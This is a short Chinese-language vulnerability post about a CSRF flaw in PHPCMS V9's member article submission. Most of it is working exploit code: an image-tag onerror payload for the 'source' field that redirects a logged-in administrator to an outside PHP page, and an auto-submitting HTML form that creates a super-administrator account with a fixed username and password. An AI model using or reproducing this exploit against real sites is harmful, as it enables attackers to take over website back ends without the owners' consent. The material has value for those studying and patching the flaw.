PHPCMS V9 文章投稿CSRF漏洞

CSRF导致可以添加后台管理员帐号。
在会员中心,文章投稿时,在来源填入:
<img src=”a” onerror=”location.href=’http://www.0day5.com/phpcms_v9_csrf_add_admin.php'”>

漏洞利用:

<form name=”myform” action=”index.php?m=admin&c=admin_manage&a=add&pc_hash=” method=”post”
id=”myform”>
<input type=”text” name=”info[username]” class=”input-text” id=”username” value=”tenzy”
></input>
<input type=”password” name=”info[password]” class=”input-text” id=”password”
value=”123456″></input>
<input type=”password” name=”info[pwdconfirm]” class=”input-text” id=”pwdconfirm”
value=”123456″></input>
<input type=”text” name=”info[email]” value=”root@0day5.com” class=”input-text” id=”email”
size=”30″ ></input>
<input type=”text” name=”info[realname]” value=”tenzy” class=”input-text”
id=”realname”></input>
<select name=”info[roleid]”>
<option value=”1″ >超级管理员</option>
</select>
<input name=”dosubmit” type=”text” value=”yes” >
</form>
<script>myform.submit()</script>

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录